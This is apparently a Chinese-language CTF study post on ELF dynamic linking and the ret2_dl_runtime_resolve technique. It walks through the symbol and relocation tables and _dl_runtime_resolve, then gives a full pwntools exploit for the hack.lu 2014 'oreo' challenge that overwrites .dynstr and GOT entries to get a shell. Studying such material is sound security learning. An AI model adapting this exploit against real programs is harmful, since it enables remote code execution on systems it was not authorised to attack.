我觉得这很难，所以开帖子记录自己的学习过程。
要学会这个利用方法首先要知道ELF文件的基本结构和动态链接的基本过程。
文章内容都是我自己的理解，出现错误也是非常正常的，欢迎指正。

动态链接：

1.在第一次调用plt的时候，会调用_dl_runtime_resolve
2.从链接库中得到地址，并且赋值到got表对应位置中。
而这个ROP利用的就是1到2之间的过程，首先我们要知道，调用_dl_runtime_resolve的时候，会传入两个参数进去，第一个参数对应的是link_map的地址，第二个参数对应的是地址在.rel.plt中的偏移。

link_map中有一个东西是.dynamic
.dynamic中有三个东西分别对应
(DT_STRTAB => .dynstr, DT_SYMTAB => .dynsym, DT_JMPREL =>.rel.plt)

这三个东西分别是啥呢，来介绍一下。

DT_STRTAB(ELF String Table)
顾名思义，str => string。这一块储存的就是导入函数的名称。
首先我们去400448h这个地址看一下。

没错，这里储存的就是所有导出函数的名称，这个表开头第一位是x00，每一个名字结尾还有个x00，标准的C语言字符串结构。

DT_SYMTAB(ELF Symbol Table)

这里放的是一个结构体。

typedef struct elf32_sym
{
    Elf32_Word    st_name; //符号名，是相对.dynstr起始的偏移
    Elf32_Addr    st_value;
    Elf32_Word    st_size;
    unsigned char st_info; //对于导入函数符号而言，它是0x12
    unsigned char st_other;
    Elf32_Section st_shndx;
}Elf32_Sym; //对于导入函数符号而言，其他字段都是0

typedef struct elf64_sym 
{
    Elf64_Word st_name;          // 符号名称，字符串表中的索引
    // STT_OBJECT表示符号关联到一个数据对象，如变量、数组或指针；
    // STT_FUNC表示符号关联到一个函数；
    // STT_NOTYPE表示符号类型未指定，用于未定义引用
    unsigned char st_info;         // 类型和绑定属性：STB_LOCAL/STB_GLOBAL/STB_WEAK；
    unsigned char st_other;      // 语义未定义，0
    Elf64_Half st_shndx;           // 相关节的索引，符号将绑定到该节，此外SHN_ABS指定符号是绝对值，不因重定位而改变，SHN_UNDEF标识未定义符号。
    Elf64_Addr st_value;           // 符号的值
    Elf64_Xword st_size;          // 符号的长度，如一个指针的长度或struct对象中包含的字节数。
}Elf64_Sym;

要注意的是
1.第一个字段放的不是字符串，而是在STRTAB中的索引
2.32位和64位的这个数据结构的大小不一样，32位是0x10，64位是0x18。

DT_JMPREL(ELF JMPREL Relocation Table)

这也是个数据结构，不过简单多了

typedef struct
{
    Elf32_Addr    r_offset; //指向GOT表的指针
    Elf32_Word    r_info;
    //一些关于导入符号的信息，我们只关心从第二个字节开始的值((val)>>8)，忽略那个07
    //1和3是这个导入函数的符号在.dynsym中的下标，
} Elf32_Rel;

我来简单说明一下：
第一个参数就是指向GOT表的指针，用于等下把地址写入GOT表。
第二个参数是要把图中我选中的黄色部分去掉，也就是(val) >> 8 的值，这个值是这个导入的函数在DT_SYMTAB中的下标。
这个0x7结尾是导入函数规定的。

_dl_runtime_resolve会干什么？

_dl_runtime_resolve会

用link_map(第一个参数)访问.dynamic，取出.dynstr, .dynsym, .rel.plt的指针
.rel.plt + Offset(第二个参数)，求出当前函数的在重定位表项(.rel.plt)中Elf32_Rel具体位置(指针)，记作rel
rel->r_info >> 8作为.dynsym的下标，求出当前函数在符号表项(.dynsym)中Elf32_Sym的具体位置(指针)，记作sym
.dynstr + sym->st_name，得到符号名字符串指针
在动态链接库查找这个字符串对应的函数的地址，并且把地址赋值给*rel->r_offset，即GOT表
调用这个函数

利用方法

1.(No RELRO)直接改写.dynstr
直接改写.dynstr中对应函数字符串内容为我们想要的内容。
比如修改free为system，这样free(buf)的时候，如果buf的内容是 "/bin/sh"，那么就实现了system("/bin/sh")

2.修改调用时的偏移(第二个参数)，指向我们构造的假的rel
我们知道_dl_runtime_resolve中利用我们这个偏移来计算出rel的位置，而正好这个偏移是没有考虑到是否越界访问的，所以可以实现让其指向我们伪造的rel结构。
都伪造好以后可以手动调用_dl_runtime_resolve达到修改的目的，两个参数(link_map, offset)。
这里要注意，虽然我们说的第一个参数，第二个参数，但是实际上，第二个参数比第一个参数先push。所以说我们这里虽然不知道link_map的地址，但是我们可以利用plt里面的push link_map的位置来执行调用，就是可以跳过push offset的那一块，直接从后面开始。

3.伪造link_map
首先要解决的是，程序获取对应符号的vernum不能够报错
解决方案
1.64位下 link_map + 0x1c8 要置0，使程序不进入if循环。前提是要泄漏出link_map的地址，位置在rop.got() + 8。
2.修改.dynamic中versym的值，要求NO RELRO

出错位置在于这里：

if (l->l_info[VERSYMIDX (DT_VERSYM)] != NULL) //l->info[0x6fffffff - tag + DT_NUM + DT_THISPROCNUM]
{
  const ElfW(Half) *vernum =
    (const void *) D_PTR (l, l_info[VERSYMIDX (DT_VERSYM)]);
  ElfW(Half) ndx = vernum[ELFW(R_SYM) (reloc->r_info)] & 0x7fff;
  version = &l->l_versions[ndx];
  if (version->hash == 0)
    version = NULL;
}

其他细节可以参照roputils里面的代码，这个程序利用的就是伪造link_maps来操作，所以官方的x64 demo中有对link_map + 0x1c8进行修改。
所以我们如果要利用roputils在x64下进行ret2_dl_runtime_resolve，那么需要以下步骤
1.用write对link_map的指针进行读取（在got + 8位置）
2.用read对link_map + 0x1c8这个位置进行写入0。
3.ret2_dl_runtime_resolve
由于以上需要的栈溢出大小较大，所以一般结合栈转移来进行（roputils中提供rop.pivot(addr)来进行栈转移，使用也较为方便）

例题：

结合方法1：hack.lu CTF 2014-OREO
在NO RELRO的情况下，修改.dynstr指针来ret2_dl_runtime_resolve。
我个人认为这个构造方法挺难的。我整了三四个小时才成功搞定这道题的ret2_dl_runtime_resolve的做法。
我这里的方法大概可以描述如下
1.修改.dynstr指针
2.伪造system字符串作为fake .dynstr
3.修改free@got.plt为free@plt + 6，也就是没dl_runtime_resolve时候的状态，只有在这个状态下才会执行dl_runtime_resolve去解析，否则会直接执行free。但是覆盖的时候要注意到结尾的x0A会覆盖到fgets的got表，而且fgets在接下来会被调用到，所以还要leak fgets的内容，并且覆盖成正确的内容，这时候x0A会覆盖到一个不会执行到的地方，就没关系了。
4.free，这时候free传入的地址是前面构造system的位置和另一个堆，所以这里选择构造shx00systemx00，并且把fake .dynstr往后移动三位。如果这里直接add再free的话，但是这时候add会报错，原因是之前构造指向的所以这个方案不可以。

from pwn import *
from LibcSearcher import *

#r = process('./oreo')
r = remote('wildwildweb.fluxfingers.net', 1414)
elf = ELF('./oreo')

def choice(idx):
    r.sendline(str(idx))

def add_data(data):
    choice(1)
    r.sendline('')
    r.sendline(data)

def add(next_ptr):
    choice(1)
    r.sendline('a' * (0x38 - 0x19 - 0x4) + p32(next_ptr))
    r.sendline('sh\x00')

def show():
    choice(2)

def free():
    choice(3)

def add_msg(msg):
    choice(4)
    r.sendline(msg)

def show_stats():
    choice(5)

for i in range(0x40 - 0x1):
    add(0)
order_msg_ptr = 0x0804A2A8
order_msg_chunk = 0x0804A2C0
dynstr_addr = 0x0804A17C
add_msg(p32(0) + p32(0x41) + '\x00' * 0x38 + p32(0x18)) #nextChunk == \x00 && nextsize = 0x18
add(order_msg_chunk + 0x8) #order_msg_chunk + 0x8 == chunk content
free() #free fake chunk

#UAF:change fake chunk fd = order_msg_ptr struct
add_msg(p32(0) + p32(0x41) + p32(order_msg_ptr - 0x8) + '\x00' * 0x34 + p32(0x18)) 

add_data('') #get fake chunk

#change order_ptr to dynstr_addr & UAF2:change fake chunk fd = order_msg_ptr_struct
add_data(p32(dynstr_addr) + 'a' * 0x14 + p32(0) + p32(0x41) + p32(order_msg_ptr - 0x8)) 

#0x8 is fake chunk struct; 0x3 is sh\x00; -0x82 is offset of 'free' in .dynstr; other hex is copy from ida
add_msg(p32(0x5) + p32(order_msg_chunk + 0x8 + 0x3 - 0x82) + p32(0x6) + p32(0x80481F8))

add_data('sh\x00system\x00') #get fake chunk
add_data(p32(elf.got['free'])) #change order_ptr to free@got.plt
show_stats() #leak fgets@plt for next change
r.recvuntil('\xf7')
fgets_addr = u32(r.recvuntil('\xf7')[-4:])
#change free@got.plt => free@plt + 6; fgets@got.plt is not change
add_msg(p32(elf.plt['free'] + 6) + p32(fgets_addr))

#system(unknown); system(sh\x00system\x00) => system(sh)
free()

r.interactive()

结合方法3：keer's bug
（借助roputils）
http://blog.wjhwjhn.com/archives/73/